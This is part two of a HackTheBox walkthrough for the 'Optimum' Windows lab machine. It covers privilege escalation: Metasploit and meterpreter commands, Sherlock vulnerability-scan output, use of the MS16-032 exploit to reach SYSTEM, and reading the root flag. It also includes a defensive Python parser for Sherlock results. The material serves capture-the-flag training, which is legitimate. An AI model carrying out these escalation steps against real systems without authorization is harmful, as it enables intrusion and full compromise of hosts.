Optimum – HackTheBox Walkthrough – Part 2


As we saw in the first part of this Optimum walkthrough, it is a beginner-level machine that is mostly about enumerating services with known exploits. Those exploits are easy to work out, and they get us the flag.

Let us continue from where we left.

As I had an issue with Windows-Exploit-Suggester, I am using Metasploit to do privilege escalation.

msf6 exploit> use post/multi/recon/local_exploit_suggester

Before running the post-exploitation module, we have to know the session ID and then set it. In my case:

> set SESSION 1

Sherlock

PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities: https://github.com/rasta-mouse/Sherlock/

We have to import the Sherlock script into PowerShell to execute it. DO NOT USE SHELL !! It won't work. Use PowerShell.

meterpreter> powershell_import /home/kali/Downloads/Sherlock/Sherlock.ps1

meterpreter> powershell_execute Find-AllVulns

Title      : User Mode to Ring (KiTrap0D)
MSBulletin : MS10-015
CVEID      : 2010-0232
Link       : https://www.exploit-db.com/exploits/11199/
VulnStatus : Not supported on 64-bit systems

Title      : Task Scheduler .XML
MSBulletin : MS10-092
CVEID      : 2010-3338, 2010-3888
Link       : https://www.exploit-db.com/exploits/19930/
VulnStatus : Not Vulnerable

Title      : NTUserMessageCall Win32k Kernel Pool Overflow
MSBulletin : MS13-053
CVEID      : 2013-1300
Link       : https://www.exploit-db.com/exploits/33213/
VulnStatus : Not supported on 64-bit systems

Title      : TrackPopupMenuEx Win32k NULL Page
MSBulletin : MS13-081
CVEID      : 2013-3881
Link       : https://www.exploit-db.com/exploits/31576/
VulnStatus : Not supported on 64-bit systems

Title      : TrackPopupMenu Win32k Null Pointer Dereference
MSBulletin : MS14-058
CVEID      : 2014-4113
Link       : https://www.exploit-db.com/exploits/35101/
VulnStatus : Not Vulnerable

Title      : ClientCopyImage Win32k
MSBulletin : MS15-051
CVEID      : 2015-1701, 2015-2433
Link       : https://www.exploit-db.com/exploits/37367/
VulnStatus : Not Vulnerable

Title      : Font Driver Buffer Overflow
MSBulletin : MS15-078
CVEID      : 2015-2426, 2015-2433
Link       : https://www.exploit-db.com/exploits/38222/
VulnStatus : Not Vulnerable

Title      : 'mrxdav.sys' WebDAV
MSBulletin : MS16-016
CVEID      : 2016-0051
Link       : https://www.exploit-db.com/exploits/40085/
VulnStatus : Not supported on 64-bit systems

Title      : Secondary Logon Handle
MSBulletin : MS16-032
CVEID      : 2016-0099
Link       : https://www.exploit-db.com/exploits/39719/
VulnStatus : Appears Vulnerable

Title      : Windows Kernel-Mode Drivers EoP
MSBulletin : MS16-034
CVEID      : 2016-0093/94/95/96
Link       : https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-034?
VulnStatus : Appears Vulnerable

Title      : Win32k Elevation of Privilege
MSBulletin : MS16-135
CVEID      : 2016-7255
Link       : https://github.com/FuzzySecurity/PSKernel-Primitives/tree/master/Sample-Exploits/MS16-135
VulnStatus : Appears Vulnerable

Title      : Nessus Agent 6.6.2 - 6.10.3
MSBulletin : N/A
CVEID      : 2017-7199
Link       : https://aspe1337.blogspot.co.uk/2017/04/writeup-of-cve-2017-7199.html
VulnStatus : Not Vulnerable

Only three entries are reported as "Appears Vulnerable": MS16-135, MS16-032 and MS16-034.

Out of the three, only MS16-032 is used here. Its module description: this module exploits the lack of sanitization of standard handles in Windows' Secondary Logon Service. The vulnerability is known to affect versions of Windows 7-10 and 2008-2012, 32 and 64 bit. The module will only work against those versions of Windows with PowerShell 2.0 or later and on systems with two or more CPU cores.
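Sherlock's output is plain key/value text, and reading it by eye gets tedious once the list grows. The following script is an added example (not part of the Sherlock project or this walkthrough) that parses Find-AllVulns output into structured records, expands the compact CVEID notation Sherlock uses (comma lists and the "2016-0093/94/95/96" slash shorthand) into full CVE identifiers, and groups bulletins by VulnStatus. From a patching perspective, the "Appears Vulnerable" group is the backlog of missing updates to prioritise. The sample input is constructed from a subset of the entries quoted above.

```python
"""Parse Sherlock Find-AllVulns output into structured records.

Added example; not part of the Sherlock project. The sample text below is
constructed from a subset of the Sherlock output quoted in the walkthrough.
"""
import re
from collections import defaultdict

SAMPLE_OUTPUT = """\
Title      : Task Scheduler .XML
MSBulletin : MS10-092
CVEID      : 2010-3338, 2010-3888
Link       : https://www.exploit-db.com/exploits/19930/
VulnStatus : Not Vulnerable

Title      : Secondary Logon Handle
MSBulletin : MS16-032
CVEID      : 2016-0099
Link       : https://www.exploit-db.com/exploits/39719/
VulnStatus : Appears Vulnerable

Title      : Windows Kernel-Mode Drivers EoP
MSBulletin : MS16-034
CVEID      : 2016-0093/94/95/96
Link       : https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-034?
VulnStatus : Appears Vulnerable

Title      : Win32k Elevation of Privilege
MSBulletin : MS16-135
CVEID      : 2016-7255
Link       : https://github.com/FuzzySecurity/PSKernel-Primitives/tree/master/Sample-Exploits/MS16-135
VulnStatus : Appears Vulnerable

Title      : Nessus Agent 6.6.2 - 6.10.3
MSBulletin : N/A
CVEID      : 2017-7199
Link       : https://aspe1337.blogspot.co.uk/2017/04/writeup-of-cve-2017-7199.html
VulnStatus : Not Vulnerable
"""

# One "Key : value" line; the lazy group plus \s*$ strips trailing whitespace.
FIELD_RE = re.compile(r"^\s*(Title|MSBulletin|CVEID|Link|VulnStatus)\s*:\s*(.*?)\s*$")


def expand_cve_ids(cveid_field):
    """Turn Sherlock's CVEID field into full CVE identifiers.

    Handles the comma-separated form ("2010-3338, 2010-3888") and the slash
    shorthand ("2016-0093/94/95/96"), where each suffix replaces the trailing
    digits of the first number in the group.
    """
    ids = []
    for chunk in cveid_field.split(","):
        chunk = chunk.strip()
        if not chunk:
            continue
        parts = chunk.split("/")
        year, number = parts[0].split("-", 1)
        ids.append(f"CVE-{year}-{number}")
        for suffix in parts[1:]:
            # "0093" with suffix "94" -> "0094": keep the leading digits
            full = number[: len(number) - len(suffix)] + suffix
            ids.append(f"CVE-{year}-{full}")
    return ids


def parse_sherlock(text):
    """Split Find-AllVulns output into one dict per vulnerability entry."""
    entries, current = [], {}
    for line in text.splitlines():
        m = FIELD_RE.match(line)
        if not m:
            continue  # blank lines and anything that is not a field
        key, value = m.groups()
        if key == "Title" and current:
            entries.append(current)  # a new Title starts the next entry
            current = {}
        current[key] = value
    if current:
        entries.append(current)
    for entry in entries:
        entry["CVEs"] = expand_cve_ids(entry.get("CVEID", ""))
    return entries


def group_by_status(entries):
    """Map each VulnStatus value to a sorted list of bulletin ids."""
    groups = defaultdict(list)
    for entry in entries:
        groups[entry["VulnStatus"]].append(entry["MSBulletin"])
    return {status: sorted(ids) for status, ids in groups.items()}


def missing_patches(entries):
    """Bulletins Sherlock flags as 'Appears Vulnerable': the patch backlog."""
    return group_by_status(entries).get("Appears Vulnerable", [])


if __name__ == "__main__":
    parsed = parse_sherlock(SAMPLE_OUTPUT)
    for status, ids in group_by_status(parsed).items():
        print(f"{status}: {', '.join(ids)}")
    print("Patch backlog:", missing_patches(parsed))
```

Feed it the full Sherlock output (for example saved from the meterpreter session) instead of SAMPLE_OUTPUT and the same functions return the complete status breakdown; the expanded CVE list is what you would hand to a patch-management or vulnerability-tracking system.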

Now let's see if the exploit is available in Metasploit:

>search ms16-032

We got the exploit, so now set the necessary options, and don't forget to set the session. Without setting the session the exploit will not work.

EXPLOITED !!! We got the session perfectly, and checking the user ID:

>getuid

Server username: NT AUTHORITY\SYSTEM

Now, finally, to get the flag we have to go to the Administrator folder:

> type \Users\Administrator\Desktop\root.txt

We successfully pwned (owned) the system.

You can also use this exploit: https://www.exploit-db.com/exploits/41020/